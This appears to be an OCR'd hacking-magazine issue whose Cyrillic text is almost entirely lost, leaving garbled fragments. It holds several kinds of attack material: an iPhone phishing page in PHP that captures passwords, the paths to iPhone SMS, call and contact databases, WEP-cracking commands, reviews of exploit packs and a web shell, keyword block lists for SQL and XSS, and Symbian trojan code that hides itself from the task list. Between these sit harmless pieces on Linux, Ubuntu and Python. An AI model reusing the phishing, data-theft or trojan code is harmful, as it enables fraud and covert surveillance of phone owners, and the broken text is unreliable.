com/2007/09/rootshell-in-my-pocketand-maybe-yours.
html MetaSploit
Framework
iPhone.

warning
!

! ,

!

060

<td colspan="2" >


<input type="image" border="0" src="r31.
gif" width="139" height="66"/>
</td>
<td colspan="2" >
<input type="image" border="0" src="r32.
gif"width="139" height="66"/>
</td>
</td>
</table>
</form>
</body>
</html>';
$pass = $_GET["fpass"];
if (strlen($pass)!=0) echo "<h1>password
sniffed: ".$_GET["fpass"]."</h1>";
else echo $fish;
?>

. .
-, . , x y,
, -
. POST . , .
, javascript.
! . , .
iframe. , :

AppleStore.
10 !

<iframe src="http://ya.ru" />

.
, javascript
.
:
<?php
setcookie("user", "test", time()+3600);
foreach ($_COOKIE as $cookie_name => $cookie_
value) {
print("<li>" . htmlspecialchars($cookie_name)
. "=" . htmlspecialchars($cookie_value) . "</
li>");
}
print("<h2>server array: ");
$tmp=fopen("iphone-mail.txt","w");
foreach($_SERVER as $key_name => $key_value) {
fputs($tmp, $key_name . " = " . $key_value
. "\n");
print( $key_name . " = " . $key_value .
"<br>");
}
fclose($tmp);
print("</h2>");
?>

cookies , - Safari:
HTTP_USER_AGENT
=
Mozilla/5.0
(iPhone;
U; CPU iPhone OS 2_2 like Mac OS X; ru-ru)
AppleWebKit/525.18.1 (KHTML, like Gecko)
HTTP_ACCEPT
=
text/xml,application/

xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/
*;q=0.5
HTTP_ACCEPT_LANGUAGE = ru
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_CONNECTION = keep-alive
SERVER_ADMIN = [no address given]
REMOTE_PORT = 6084
SERVER_PROTOCOL = HTTP/1.1
REQUEST_METHOD = GET
QUERY_STRING =
argv = Array
argc = 0

, , ,
<iframe src=/>

iframe
. - width height
. , .
, .
, src= (,
src="blablabla")
. ( ) 3-4 . ,
, .
, . html- iframe, :
X 03 /123/ 09

>>
<?php
header('Content-type: application/vnd.ms-excel');
header('Content-Disposition: attachment;
filename="downloaded.xls"');
readfile('xls.xls');
?>

/ (timer_outgoing/timer_incoming).
/private/var/mobile/Library/Notes/notes.db
. note_bodies: note_id ( )|data ( html , UTF-8).

, PDF/DOC/XLS . !
. , , :

Note:

ROWID ( -

)|creation_date ( )|title
)|summary

)|contains_cjk (?).

/private/var/mobile/Library/SMS/sms.db
:). message: ROWID|address (

)|date|text

UTF-

8)|flags|replace|svc_center|group_id ( ,

<meta http-equiv="Refresh" content="1;


url=http://ya.ru">

)|association_id|height|UIFlags|version.

msg_group: ROWID|type
url , ( ). ,
. ,
- .

4. LOCATION SPOOFING
...
, , .
, . ,
iPhone/iPod
. :
www.syssec.ch/press/location-spoofing-attacks-on-the-iphoneand-ipod. ,
:). : Apple
iPhone 2g Apple iPod touch , GSM-
WiFi-. WiFi-
http://www.skyhookwireless.com (,
).
iPod touch GSM-
, WiFi- . , , ,
( )
( ), .
, -, , . iPhone
2g, , ,
GSM. ,
, ,
. , iPhone
, GSM.

dvd


AppleStore
.


.

(, 0)|newest_

message (ID )|unread_count (- ).


. group_member: ROWID|group_
id|address ( ). .
, , .
,

.
/private/var/mobile/Library/WebKit/Databases/
Databases.db , WebKit. . Databases: guid|origin
(, gmail http_mail.google.
com_0)|name ( GmailMobileWeb)|displayName|e
stimatedSize ( )|path ( ).
. /private/var/
mobile/Library/WebKit/Databases/<origin Databases.
Databases>/<path Databases.Databases>.
.
/private/var/mobile/Library/AddressBook/
AddressBook.sqlitedb /private/var/mobile/
Library/AddressBook/AddressBookImages.sqlitedb
( ).
ABPerson. : ROWID|First
()|Last ()|Middle ()|FirstPhonetic|Midd
lePhonetic|LastPhonetic ( )|Organization|De
partment|Note|Kind|Birthday|JobTitle|Nickname|Prefix|Suff
ix|FirstSort|LastSort|CreationDate|ModificationDate|Compo
siteNameFallback|ExternalIdentifier|StoreID|DisplayName|F
irstSortSection|LastSortSection|FirstSortLanguageIndex|L

. ?
, :
. ,
, ? . iPhone sqlite.
(, -, ,
) ,
. :
/private/var/mobile/Library/CallHistory/call_
history.db . call:
ROWID ( )|address ( )|date (
)|duration (
)|flags ( , )|id ( ?). _SqliteDatabaseProperties -

, ,
X 03 /123/ 09

astSortLanguageIndex.

,
.
. , .

. .
: unix- !

. Apple iPhone
. , ,
, . , : http://
oxod.ru. z

061



ENTHUSIAST INTERNET AWARD 2008
26

web- Enthusiast Internet


net
Award 2008 ( Gameland).

11

web ,
$50 000.

- en
thusiast inte
rnet award 20

08
,
$25 000

ga

meland

lifes

lides.ru.



$15

00
0
hobiz.ru




0
0
0
0
1
$
.ru.
wifi4all

11

:

Enthusiast Internet Award ,


web, - .
. 3 , Enthusiast Internet Award 2009, 30 000 000
. 1300 .
,
, .
Gameland .
Enthusiast Internet Award 2008 Gameland
: Oklick (

),
Microsoft mail.ru,

mail.ru .
.

>>
D0ZNP
/ HTTP://OXOD.RU /

WEP
, WEPLAB AIRCRACK

. , , . WPA ... , WEP! ,


? .
,
? WEP-
weplab aircrack.
,
, .
UNIX-. . Debian,
, . , aircrack Windows, weplab
Cygwin. ,
. ? ,
. , , ,
.
.
, , WEP.
.

WEPLAB
64- WEP-.
128- k 128. ,
64- , 128-.
64- : ,
- . . :
( ), . - ,
. :

064

weplab b dump.pcap
//
cat slovar.dict | weplab y dump.pcap
//
weplab r dump.pcap
//

.
. , ,
WEP . ,
, ?
? , ?
, ? ?
.

WEPLAB
, ,
, , : ,
.

WEP. ,
WEP-
WPA-! , ,
.
X 03 /123/ 09

>>

Aircrack

info


.
.

warning

! ,

!

Aircrack Windows

. , :
weplab,
. ,
. 50.000
64- 200.000 128-
, . :
( ,
). 64- WEP- 128- 10/1
(20.000 , 2.000 20 ),
X 03 /123/ 09

weplab ( --perc). 80%


(
100% 1.4),
! , , 400.000
64- WEP, weplab.
, 5 .

20 50.000 128- WEP
5.000 WPA.
wepcrack. 200.000
, .
!

065

>>

Aircrack , WPA

AIRCRACK
. aircrack-ng. WPA, WEP.

MAC-
. ,
? .
wep-.
WEP, . :
PTW (Pyshkin, Tews, Weinmann) FMS (Fluhrer, Mantin, Shamir).
. :
aircrack-ng dump.pcap
//
aircrack-ng b 00:00:00:00:00:00
//
aircrack-ng y
//

AIRCRACK-NG
. :
WPA, aircrack WPA, ,
WEP- ( - ) -

066

. 1.000.000 128- WEP-


1.000 WPA. aircrack
, , WPA.
,
. ,
(aircrack-ng a1 dump.pcap), .
, ,
.
,
. , ,
450.000 128- WEP,
, 200.000 , 128-
WEP-. Aircrack ( 200.000 ).
(aircrack-ng d XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:
XX:XX:XX). 450.000 , !
100 , : aircrack
( ; ,
) 9 100.
aircrack
. , aircrack-ng
. , ,
, IDS.
X 03 /123/ 09

>>

weplab

(
,
, ) , , --.


, , ? ,
! , ,
486-
.
USB-.
USB- ( WiFi-)
busybox.
.
, .
, ,
, .
,
.
, , :
aircrack-ng.
aireplay,
(
).
r fakedump.pcap
.

. txpower
iwconfig. (iwconfig eth1
txpower 15) (iwconfig eth1 txpower
30mW). ,
sens, rts, frag, power .
IDS .
, honeypot.
.
-
.
tcpdump ,
.
,
, .
X 03 /123/ 09

Aircrack: !

,
, , IV
,
WEP. , ,
128- 104 ,
64- 40 . . - .


. , ,
. ,
.

.
, ,

, .

oxod.ru. z

weplab

links

aircrack-ng.org

aircrack.
weplab.sourceforge.
net weplab.
oxod.ru .
,
.
www.cdc.informatik.
tu-darmstadt.de/
aircrack-ptw PTW.
aircrack-ng.org/
doku.php?id=links&
DokuWiki=d63d97e
f16cadcdb9e1281e
83d4e5875#techniq
ue_papers
WEP.

067

>>
BALASEK

-. :
, , , ...
, . ,
, n- . ?
, - .
( z
, ,
).
,
(, , ..),
.
,
,
, exe.
.
,
. , , .
,
iframe-, ,
.
, .
(
).
,
.

?
, :
1.
2.
3.
4.
5.

068

, ,
Fiesta. 2.4,
:
7 ,
Acrobat <= 8.1.2
4/5/6 30%
9.2 15%
( //)
$700

, ( ) 30%, , , .
,
. , .
:).
Unique Pack 1.1 Full.
, :
1. MDAC ()
2. PDF VIS PDF-
(v.8.1.1 + v.8.1.2)
3. MS OFFICE SNAPSHOT
4. IE 7 XML SPL XML IE 7
5. FF EMBED
30%

$600 + $100


.
X 03 /123/ 09

>>

Armitage

G-Pack:
- 30%
IE <= 6 , IE 7

,
$100

: ,
-. -

:).
Icepack. :

IP

ftp- ftp-

(
, )
(,
exe)
$200

Fiesta


IP

.


,




:
SQL
TEXT DB
TEXT-

-


(
, , ..)
$1000

,
. , ,
USA- . ,
, , .
.
Infector by xod.
:

, .
,
.
. ,
, .
, , , :).
Neosploit-2, , , , , , . , :


PHP-
-

,
.
( )
, -

X 03 /123/ 09

069

>>

G-Pack
ICE-Pack
javascript-

exe ( 1 )
. exe-
, exe

IP
, , ,

IP (
)
. ,
exe.
(, )
IE FireFox
$1500

,
. , . -
. ,
, :).


,
web-. Sutra TDS.
:
URL:
1. ()
2. ( URL)




:
1. ( GeoIP)
2. / ( )
3. (/ )
4. IP
5. HTTP_REFERER
6. HTTP_REFERER
7. IP- IP-
8.

: / / / /
/ / / /

070



/
.
UPTIME BOT
URL. URL , ( 4** 5**), UPTIME BOT URL ( )
URL
UPTIME BOT URL
, , UPTIME BOT URL
UPTIME BOT

$100,
. , .
!
, 2-3 ,
.

exe :).


,
- . , , . 50%
- 20% USA.

. ,
, , 1-2k .
.
, g
. z
X 03 /123/ 09

>>
R0ID
/ R0ID@BK.RU /

:ADVANCED TRAFFIC
DIRECT SYSTEM
: *NIX/WIN
:ADVANCED SCRIPTS


.
, ,
, Advanced Traffic Direct
System .

(aka TDS),
. ,
, :
,

( GeoIP)
( IP cookies)
URL
.
:
1. Primary-: ,

2. Secondary-:
,

(confg.php) TDS.
:
$UseCron (On/Off) /

072

$UseURLCron (On/Off)
; Off
URLs
$CheckURLTimeOut
,
, , .
= 5 , ,
$OptimizeTables (On/Off) /
. ,
TDS

$DoCronLog (On/Off) /

$PassQueryString (On/Off) ,
out.php (
URL)
$VisualTimeOffset . , , ,
.
, , ,

.
Settings, :
New Password, Confirm Password

Alternative URL URL,
, -

Path to GeoIP GeoIP, , /usr/local/bin/geoiplookup.


Unknown
Save full stats ,

Check URLs
URL .
URL

. .
, :

1. Cant open file: tbl_name.MYD


tbl_name
- .
:
a) REPAIR TABLE tbl_name
( tbl_name
)
b) repair.php
(./r_admin/tools/repair.php),

2.
Unknown GeoIP,
GeoIP,
Settings
3.
Settings ,
./r_admin/config/
config.php, ,

: DLSECURE MODULE
: *NIX/WIN
: NUR, GREEN_BEAR AND WINUX
-,
.
,
,
X 03 /123/ 09

>>


PHP-.

,
. , -, .
DLsecure module. ,

php-.
PHP-,

.
:


IP-
XSS

SQL-

include-
DDoS-

ftp- ssh-

,
XSS/SQL/INCLUDE-, variables.php:
$bad_sql = array("union,"select","
from","where","insert"," or "," and
","/\*","",);
$bad_include =
array("http://","../",".php",".
phtml",".php3",".php4","./",".
php5",);
$bad_xss = array("<script","docume
nt.cookie","javascript:",);

.
. , - (
z).
( )
,
,
. ,

( ).
: , ?.
, , ,
Ponchiks universal fake
:). ,
Ponchik,
. ,
:

1. /
2.
3.
-

1.
2.
3.
4.
:)

. ,
. (aka )
,

,
. , , ...

: HIASM
: WINDOWS 2000/XP
:HIASM STUDIO

: PONCHIKS UNIVERSAL
FAKE
: *NIX/WIN
: PONCHIK

:)
X 03 /123/ 09


,
,
/PHP-, /++,
!
. HiAsm. ,

.
,
- . .

, , , .

( ),
, ,
.
, ,
:).

: WSO
: *NIX/WIN
: ORB

web-shell
,
-.
,
. ,
, web shell by
oRb ( WSO). -, ,
,
. WSO
:).
16 ,
:



SQL-
, , , , , ,
,
, , ,

POST-
PHP-

-
,
Safe-mode ( ,
)
FTP/MySQL-
C/Perl

, - *nix-.
,
, , :).z

073


1 2009

2008
!

www.gameland-award.ru

2009

Metal Gear Solid 4: Guns of the Patriots


Command & Conquer: Red Alert 3
Tomb Raider: Underworld
Super Smash Bros. Brawl
Guitar Hero: World Tour
Grand Theft Auto IV
LittleBigPlanet
Prince of Persia
Devil May Cry 4
Soul Calibur IV
Gears of War 2
Mirrors Edge
Fallout 3
Fable II

>>
MIFRILL
/ MIFRILL@RIDDICK.RU /

, .
, , ,
. (
), . , Windows .
WHO IS MISTER RUSSINOVICH?


, (Mark Russinovich) .
, . ,
, , , !
, ,
,
, ,
Windows. 2006 Top 5 , eWeek, .
, , (,

076

) -,
: .
, IBM ( ).
. 1996 ,
(Bryce Cogswell),
, Winternals Software LP.
freeware
MS Windows. ,
,
, .
X 03 /123/ 09

>>

RootkitRevealer


Sysinternals.com ( ntinternals),
60 . , ,
Process Monitor ( Filemon Regmon), Process
Explorer, RootkitRevealer NTFSDOS, , , (, NTFSDOS NTFS- MS-DOS).
,
NTFS DOS. , ,
, .
,
. , Winternals
Administrator Pak. ,
Linux, Windows, , .
64- . , ,
Microsoft, .

. 2006 Winternals Software
, Sysinternals
. ,
, Windows,
, .
, Microsoft,
Winternals Software.
Sysinternals . , ,
,
Linux, NT Locksmith,

. , Microsoft
. ,
, Sysinternals
.
Microsoft Technical Fellow, , ,
.
,
(Platform and Services Division).
X 03 /123/ 09

, ! :)


,
malware-. ,
2006 :).

, ,
,
. 2005
, Microsoft. ,
RootkitRevealer,
, . ,
: ,
, ,
,
, RKR.
RootkitRevealer, Sony BMG Music Entertainment,
Amazon.com. ,

077

>>

HKLM\System\CurrentControlSet\SafeBoot, .
, , , ,
, .
IT- , , .
Sony,
, , ,
. , , , ,
, . ,
, , .
,
. , , Microsoft Windows Internals
( Microsoft Windows).
,
TechNet Magazine Windows IT Pro ( Windows NT
Magazine). , ,
http://blogs.technet.com/MarkRussinovich,
http://blogs.technet.com/mark_russinovich
.
Microsoft.
, , ,
. , , Windows 7 , ,
Winternals . . ,
,
, , ,
, . , , , -

Sysinternals

DRM (Digital rights management), ,


. ,
, Sony ,

078

,
Microsoft. ,
,
. z
X 03 /123/ 09

>> unixoid

/ DHSILABS@MAIL.RU /



UBUNTU 8.10

,
. .
, , .

. , .
:
Reconstructor (reconstructor.aperantis.com).
ISO- Ubuntu (www.ubuntu.com).
6 Linux-.
.
Reconstructor ISO- Ubuntu,
. , (2.8)
Hardy, Ubuntu.
, Intrepid
Ibex (Ubuntu 8.10), .
6 ,
LiveCD Ubuntu 5 +
( 700 ).
, .


, (
). sudo. ( , root). Next ,

080

LiveCD .
. LiveCD, ,

, Ubuntu.
, ISO-
Ubuntu . ,
Windows-, 700
Linux- ( 6
openSUSE ). .
, LiveCD Ubuntu
( ). root,
.
! LiveCD Create Remaster Directory, Create Root Directory, Create Initial Ramdisk
Directory. ,
.
, , (X 03 /123/ 09

>> unixoid

, ,
..) ,
. -.
. , 5-10.


, .
Boot Screen.
Live CD Splash GRUB.
GIMP. : PCX, , 256
, 640480 800600. Live CD Text Color
GRUB.
GRUB, .
Ubuntu , Upslash Filename.
SO- gnome-look.org,
. GIMP,
, PNG ( 640480,
800600 , , 256 )
Generate. PNG-,
SO-,
Usplash Filename.
. ,
.
Usplash. 640480,
800600. Usplash
LiveCD, Usplash .
, , Upslash 800x600
, LiveCD.
!
, LiveCD
Usplash,
Usplash Ubuntu. :

, Ubuntu. , Usplash,
.

gnome-look, , ( : ,
Background Color).
Desktop , Theme ,
.

APT OPTIMIZATION
Apt ,
.
, . . ,
Ubuntu 8.04, ,
Ubuntu 8.10.
( ),
Optimization LiveCD.
, LiveCD
(
).
, , , .
. Modules
. , GIMP OpenOffice .
MPlayer, Flash-
Firefox. (Execute) (Run on boot). , MPlayer
, MPlayer Execute
Apply.
(Estimated ISO Size).
702 , 745 .
,

links
Denix:
denix.dkws.org.ua.

:
gnome-look.org.

Ubuntu (. )
:
citkit.ru/articles/222.

Boot Screen

GNOME
Login GDM- (GNOME Display
Manager).
. ,
. gnome-look.org,
(),
, .
Splash Screen ,
. -,
X 03 /123/ 09

081

>> unixoid

info

,
?
GIMP,



256.

PNG-.

?

gnome-look.org.

.
:

GIMP,

gedit.
.


Ubuntu
Customization Kit,
, ,
.
UCK
Ubuntu
8.10.

082

Modules

Custom apt-get (install) Apply.


, , 1 2
3. ,
. ( ), , ,
. , Custom apt-get (remove)
.
, .
root- , .
, .
(
),
sudo mc mc (
?) root.
, ISO.
/media/disk/livecd.
initrd (, , ?),
remaster ( ISO), root (
).
?
remaster *.exe- autorun.ini.
1,3 . , ?
initrd/etc/casper.conf ,
GNOME ( Denix
session user):

Gnome

export
export
export
export

USERNAME="denix"
USERFULLNAME="Denix session user"
HOST="denix"
BUILD_SYSTEM="Denix"

,
, Apply
ISO. Next .

ISO
!
LiveCD, , Initial Ramdisk,
SquashFS Root, Live CD (ISO). LiveCD, , , ,
!
!
Filename LiveCD. ,
( 750 ),
ISO- . Description .
Next
.

ISO
(, Nero for Linux) .
GRUB. , .

X 03 /123/ 09

>> unixoid

Denix

.
GDM-.

. - .
LiveCD ,
, : Ubuntu,
, LiveCD,
LiveCD !
: ( ), . mc root
/var/cache/apt/archives:


! , :
( )
Usplash Ubuntu, ;
Examples Ubuntu;
GNOME Ubuntu;
.
Usplash .
sudo mc. ,
.
/media/disk/livecd, /media/disk/livecd/root.
/usr/lib/usplash LiveCD ( , /media/
disk/livecd/root/usr/lib/usplash). SO- Usplash.
Usplash- 800600?
usplash-theme-ubuntu.so. ,
usplash ,
. ,
400 , 2 . . /usr/share/example-content LiveCD (/media/disk/
livecd/root/usr/share/example-content). , ,
.
.
. ,
. , usplash ,
. . OGG
(
OGG oggenc) /usr/share/sounds.

/usr/share/sounds/ubuntu,
OGG- desktop-login.ogg
, GNOME.
, GNOME desktop-logout.ogg.
! ,
, .
Terminal :
$ sudo apt-get install <_>
$ sudo apt-get remove <_>

, , .
X 03 /123/ 09

$ sudo mc

/media/disk/livecd/root
LiveCD. deb /var/cache/apt/archives:
$ mkdir deb
$ cp /var/cache/apt/archives/*.deb /media/disk/livecd/
root/deb

LiveCD.
:
$
$
$
$

cd deb
dpkg i *.deb
rm *.deb
exit

deb, ,
. : ,
, !
deb- , LiveCD . .

. , , !
: LiveCD
OpenOffice GIMP, ,
MPlayer, CD. 695 . ,
DVD. Denix 0.5 Full 981 .
OpenOffice 2.4 OpenOffice 3.0 Pro
, , MPlayer, Thunderbird, FileZilla. , . CD-,
, DVD? , , !z

083

>> unixoid
J1M
/ ZOBNIN@GMAIL.COM/

LINUX

Linux .

,
. Linux ,
. .
2007 . 2.6.20-2.6.23
2.6.20 , i386. 2.6.21
WMI (Virtual Machine
Interface), VMWare
. Linux
VMWare - . 2.6.23 Xen
lguest (Linux Linux).
2.6.20 KVM (Kernelbased Virtual Machine).
SVM/AMD-V Intel VT. ,
,
.

qemu .
2.6.21 KVM
/ .
2.6.23 KVM .

084

Fault injection, .
,
.
SGI Linux Slab allocator
SLUB, SMP- . Slab allocator , , .
2.6.23.
.
, Devicescape, WiFi-. , , MAC, WEP, WPA, QoS,
802.11g ,
.
FireWire-. , ,
.
X 03 /123/ 09

>> unixoid

Linux Kernel Summit 2007


CFS (Completely Fair
Scheduler). , ,
rbtree,
.
CFS ()
(HZ).

2.6.24 25
Control Groups
cgroups. ,
, .
,
.
,
( ),
Task Control Groups,
CFS Cpusets
( ).
CFS. 10%
Fair Group Scheduling,
. (, multimedia, net).
, Documentation/sched-designCFS.txt.
Tickless x86-64, PPC, ARM,
MIPS UML (User Mode Linux).
,
.
MMC
SDIO (Secure Digital I/O) SPI. , , SDIO (, ),
, - SD
(, GPS-, - ..).
Wireless USB,
USB-. ,
USB- , .
, 0 /sys/bus/
usb/devices//authorized.
X 03 /123/ 09

.
.
Large Receive Offload (LRO). TCP-
, .

2.6.25 17
Memory Resource Controller
(Task Control Groups).
,
. OpenVZ
.

. ,
,
.
proc
pagemaps,
,
.
SMACK,
LSM-. SMACK (, , ..),
, SELinux.
, LatencyTOP (www.
latencytop.org) . LatencyTOP,
.

, Exec Shield (people.redhat.com/mingo/
exec-shield)! brk()
,
.
Volkswagen CAN
(Controller area network)
.
ACPI, API
( ,
).
Ext4 , :

085

>> unixoid

Ext4 IOZone

1. , 64 .
2. .
3. , ,
.
4. inode NFS .
5. Extent-based (
).
6. .
, , .
MN10300/AM33,
c NAS Orion.
2.6.26 14
, mount
--bind, 14 .
, root-, .
KVM,
, IA64, PPC S390
.
, 2.6.22,

Kernel.org Linux-

086

802.11s, Open80211s (www.open80211s.org).


Per-process securebits
setuid-
, (
).
cgroups (Control Groups)
.
,
memtest (www.memtest.org),
.
memtest .

/sys/class/bdi,

/proc/$PID/mountinfo.
PCI Express ASPM
(Active State Power Management).
. ,
KGDB,
. !

2.6.27 9
Linux UBIFS,
Nokia
flash- . UBIFS
JFFS2
, ,
.
UBIFS, OMFS (Sonicblue Optimized MPEG File System support),
MPEG-
-.
Multiqueue networking,
. ,
Wireless Multimedia
Extension, ,
.
, , close-on-exec.
X 03 /123/ 09

>> unixoid

Changelog Linux 5.7

fork().
, ,
.
,
kdump kexec. , .
kdump , kexec . ,
ACPI.

SCSI- SATA-, SBC Data Integrity Field
External Path Protection .
mmiotrace, /, .
, , .
firmware .
/lib/firmware make modules_install
.
Ext4 .
write()
,
( , ). . ZFS, XFS, Btrfs Reiser4.
gprca (mxhaard.free.fr/download.html)
230 USB-.
: Marvell Loki.

2.6.28 25
Ext4 . , .
GEM (Graphics Execution Manager), . GEM
Intel
.
, (
, !) .
GEM i915,
3D- 50%.
Wireless USB X 03 /123/ 09

KGDB

UWB (Ultra Wide Band), - (3.1-10.6 )


( 10 ). ,
UWB-, Wireless USB 1.0.

. - (
), ,
(, malloc()).
cgroup ,
.
. ,
.
. Linux
!
netfilter
TPROXY iptables. Multiqueue networking .

Linux, ,
, , , :
1. Linux
. , , , , .
2. Linux , ,
-, , . , , .
3.
, (,
, ).
4. ,
.
5. . z

087

>> coding

/ ZANITO@GMAIL.COM /

-, ,
. , . , , . ,
, . z , ,
.
.
! -,
, ? -,
, . -,
, .
,
.


, :
1. ,
xakep.ru.
2.

088

-.
3. , ,
.
4. ,
: , . -.
5. .
. ? ,
. ,
, , , , .
, ,
.
X 03 /123/ 09

>> coding
? , , :
1. , .
2. ( !) . ,
.
3. , /, , /
.
4. ,
, , , ,
, .
5. , ,
.
,
. ,
, , . .
, ,
, .

,
?
.
:
1. ( ) ;
.
2. , ,
, .
3. ,
, , .
4. .
, MS Project. ?
, , , ,
.

, ,
, .
, ,
. , .
, ,
. ,
, , ,
, .
-, -,
( ),
.
.
, , ,
.
,
. ,
-
- - , .
, .
. ,
.

.
, .
. , ,
. ,
, 666 ,
- . ,
! , .
.

,
71, z
, z , .
, (
CuTTer). , . -
:
. ,
.
,
. ,
HTML - 250000 .
, . , .
, , , ,
,
,
, .
-][-. ,
: ,
, ?
. - , -,

.


,
. X 03 /123/ 09

089

>> coding


?
-
, :
.
,
, , ,
. ,
, -
. , ,
4-5 15-20 .
20-30
.
30, 40,
50 , . 40-50
. ,
, ,
. , .
1-3 ../,
, 10-15 ../, - .
, 17-20 ,
.
- ,
.

.
- .
.
, .
, ,
, .
, (, !),
.

- ( ,
PHP+AJAX) , ,
. Java, -
Web. -
;
.
, ,
, -
; ,
.
, , ,
Flash HTML. Google -
freelance programmers,
. , ! , ,
, , , ,
.
.
, . , , ,
, .
,
. ,

090

,
. . ,

. ,
.

.
. , ,
,
, .
, . ,
.
,
.
? ? , ,
.
, ,
. ,


( , ).
, ,
,
. ,
, ,
.
, ,
- . ,
, - . , ,
( ). ,

.
, .
, , , .
,
/, ,
.

, .
? ,
, 2 .. ,
10 ..? - ,
( ,
) open-source . ,
.
( ),
. -
1-3 . ,
, , .

.
X 03 /123/ 09

>> coding
.
. ,
? , VIP Depeche Mode . ,
, . .
.
, , .
, ,
- , . , .Net 4.0
, ,
ASP.NET MVC!
, ,
. .
.
, .
, ,
. 2-3
, .

P
, , , , . ,
. , .
-, Zihotki, ASP.NET,
,
. , .


. ,
, ,
. , , ,
, , , ( ).
,
. , -
, .

, .
, .
, , .
, ,
. , ,
, .
. ,
- , . . . .
: ,
, . , . ,
, , .
, ,
4-5 .
. , ,
. , .

PHP. .NET Java
( ),
Pyton Ruby.
X 03 /123/ 09

Zihotki


!
, , ,
, .
,
,
.
( ), fuck .
,
- , ,
. ,
.
, . , ,
.

?
; ,
,
. .
. z

091

>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /

PYTHON
Python .
, Star Wars: Episode II
Tommy Burnette, , Industrial Light
Python Google, ,
. Google Python,
, .
Peter Norvig, , Google, Inc.
, Python.

: ,
, - .
, , ;). , Python
c .
. , , ,
. , Python . 2,
10 , Java!

LETS PLAY!
Python .

. ? >>>

092

, . ( ).
>>> 2 + 2
4

,
:).
>>> tax = 12.5 / 100 #
>>> price = 100.50
>>> price * tax
12.5625
>>> price + _
113.0625
>>> round(_, 2)


. , X 03 /123/ 09

>> coding
>>> for x in list:
...
print x, len(x)
Python 6
is 2
cool 4
!1

Emacs IDE Python

. ,
.


, - ,
Python ,
Python
. ,
.
.
Python ,
.
- . :
>>> # .
... # .
... a, b = 0, 1
>>> while b < 10:
...
print b
...
a, b = b, a + b
112358

Python for
( foreach).
, ? List
. ,
.
. ,
, list.
, , ,
.
, ( ).
(
) .
range(), -.

: ( -),
( ), ( ), (- )
( ).
, .
, , (
,
). ,
,
. -,
..
, .

links
http://python.org
,
,

.
http://www.intuit.ru/
department/pl/python

.
ru.diveintopython.
org/toc.html


Python.

Python MatLab

, ( !) ( , ,
). .
, !
,
. , , -
. . ,
Python . ,
. , , .
- .
( ).
Python x
y, .
x, y = y, x!
, for.
:
>>> # .
... list = ['Python', 'is', 'cool', '!']
X 03 /123/ 09

093

>> coding

ForecastWatch.com Python


Python . ,
,
(, ..).
(, ), .
, .
, .
:
>>> def make(a):
...
return lambda x: x**a
>>> f2 = make(2)
>>> f4 = make(4)
>>> for i in [1, 2, 3]: print f2(i)
149
>>> for i in [1, 2, 3]: print f4(i)
1, 16, 81

.
. Python () . lambda- ( , lambda-,
). lambda
x: x**a , x
, (** ).
make.
, .
(closures). , .
a,
.
make, .
. , a, ,
. make
a. make (!),
. , :).
, Python . , -
(). ,
. . : ,
(- - ),
.. , ,
,

094

Python
. :
CPython .
. , Python ISO ANSI,
CPython. ,
. -,
. *nix-, Win ..
Jython, IronPython JVM.
, Java -.
Java- Python-. . ,
Python.
IronPython , Jython, .Net. .Net- Python-
.
CPython-.
Stackless Python CPython. .
(GIL). ,
,
.
PyPy Python, Python!
.
(Javascript, LLVM, CLI
.).
PyS60 Python Nokia.
CPython c
Symbian OS.
( ), ,
. Python
.
. :
>>> def logger(f):
...
def ret( *args, **kwargs ):
print "enter in", f.__name__
...
...
f( *args, **kwargs)
...
print "exit from", f.__name__
...
return ret
>>>
>>> @logger
... def foo(x):
print "foo:", x
...
>>>
>>> foo("hello")
enter in foo
foo: hello
exit from foo

foo @logger.
, . ,
@logger foo
: foo = logger(foo). , foo ,
@logger , foo.
, ,
.
X 03 /123/ 09

>> coding

Python,

, : def logger(f):
return f. ,

, Python - , - - . . , , , , Python
. .
.
, ,
, , .
, - .
, ,
. obj.f(),
obj, , ,
f. . .
Python . !
. , !
.
, - . ,
Python . (
!). .
, , .

Python . , Python (Batteries Included). ,
(CPython) , . :
;
;
X 03 /123/ 09

;
;
, , ;
( );
- (mime,
smtp, pop, jsoon, http, ftp, nntp telnet, cookie, cgi .);
xml- ( dom sax-);
(zip);
(
);
framework -;
;
;
;
;
;
(md5, sha, hmac, hashlib);
( , );
(IPC);
;
;
c Tk ( GUI).
, ! ,
Python.
. ,
,
. Python, ,
! Python
.

Python , ,
, -.
, Python . , , ][
:). z

095

>> coding

/ ROOT@DTARASOV.RU /

CEikonEnv::Static()->
RootWin().EnableReceiptOfFocus(
EFalse);
//

CEikonEnv::Static()->
RootWin().SetOrdinalPosition(1000,
ECoeWinPriorityNeverAtFront);

#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO
blacklist
{
executable_name = c:\\sys\\
bin\\YourApp.exe;
recovery = EStartupItemExPolicy
None;
}

-
SYMBIAN

void CMegaTrojAppUi::
HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground)
{
case ETrue:
{
CEikonEnv::Static()->RootWin().
SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv>WsSession());
task.SetWgId(CEikonEnv::Static()->
RootWin().Identifier());
task.SendToBackground();
}
break;
}
}

SYMBIAN? !

, , sms .
, . , .

- Nokia,
Samsung LG S60.
.


. ,
,
, ,
( ,
sms, GPRS ..). ,
, :
1. , ,
sms, . 93- 103- z.
2. - SMS.
.

096

Premium SMS 0,5 $ 5$ , ( ) .


3. ,
GPS-,
, , .
.
,
.
, , -.
- , ,
-.
, .
Premium SMS ( ,
) .
Symbian. ,
.
X 03 /123/ 09

>> coding


,
, ,
sms, .
,
.
,
,
, , , sms. ,
. , ? ,
Symbian tcp sockets ( HTTP
over TCP)
(Internet Access Point). ,
, .
, ,
.
X 03 /123/ 09


. ,
:
(
, task list).
.

(IAP).
,
.

.
.
, , ,
, Symbian 9, ,
SymbianSigned.

097

>> coding

warning
z
,


.

.
, Symbian,
, , ,
.
, , ,
Symbian ( ).


, .
Carbide C++,
Visual Studio.NET Carbide.
VS. Symbian Hello
World Application (,
SDK, SDK
). .
, :
1) , AIF_DATA Symbain
7.x-8.x APP_REGISTRATION_INFO Symbian 9.x.
, UID .
:
hidden = KAppIsHidden;


.
2) -

098

UpdateTaskNameL,
Task-:
void CMegaTroj::UpdateTaskNameL
(CApaWindowGroupName*aWgName)
{
CAknDocument::UpdateTaskNameL(aWgName);
//
UpdateTaskNameL
aWgName->SetHidden(ETrue);
// -
